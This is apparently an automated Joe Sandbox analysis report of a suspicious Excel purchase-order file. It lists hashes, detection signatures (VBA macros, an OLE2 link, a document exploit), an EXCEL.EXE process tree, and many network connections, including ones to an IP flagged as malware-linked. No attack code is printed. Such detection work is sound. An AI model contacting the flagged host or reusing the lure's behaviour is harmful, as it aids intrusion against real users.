Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-ARJ-2025-15ACA.xla.xlsx

Overview

General Information

Sample name:PO-ARJ-2025-15ACA.xla.xlsx
Analysis ID:1639278
MD5:9d0c7d82a1c18e1006e6075584652e83
SHA1:68f97d343b3419df1b2d25c50c0d72d6af4fd59e
SHA256:34954100e490a77310918573e56868e651855b54ddb0cc0dd334f55e8e195f14
Tags:xlaxlsxuser-abuse_ch
Infos:

Detection

Score:60
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Excel sheet contains many unusual embedded objects
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Unable to load, office file is protected or invalid
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 7860 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • splwow64.exe (PID: 1860 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 5112 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO-ARJ-2025-15ACA.xla.xlsx" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 198.12.89.24, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7860, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49729
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49729, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7860, Protocol: tcp, SourceIp: 198.12.89.24, SourceIsIpv6: false, SourcePort: 80
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-15T09:08:23.188920+010020283713Unknown Traffic192.168.2.44973213.107.246.60443TCP
2025-03-15T09:08:29.737992+010020283713Unknown Traffic192.168.2.44973513.107.246.60443TCP
2025-03-15T09:08:29.783652+010020283713Unknown Traffic192.168.2.44973413.107.246.60443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: PO-ARJ-2025-15ACA.xla.xlsxAvira: detected
Source: PO-ARJ-2025-15ACA.xla.xlsxVirustotal: Detection: 43%Perma Link
Source: PO-ARJ-2025-15ACA.xla.xlsxReversingLabs: Detection: 38%
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: global trafficDNS query: name: otelrules.svc.static.microsoft
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49729 -> 198.12.89.24:80
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49729 -> 198.12.89.24:80
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.4:49729
Source: global trafficTCP traffic: 192.168.2.4:49729 -> 198.12.89.24:80
Source: global trafficTCP traffic: 192.168.2.4:49729 -> 198.12.89.24:80
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.4:49729
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.4:49729
Source: global trafficTCP traffic: 192.168.2.4:49729 -> 198.12.89.24:80
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.4:49729
Source: global trafficTCP traffic: 192.168.2.4:49729 -> 198.12.89.24:80
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
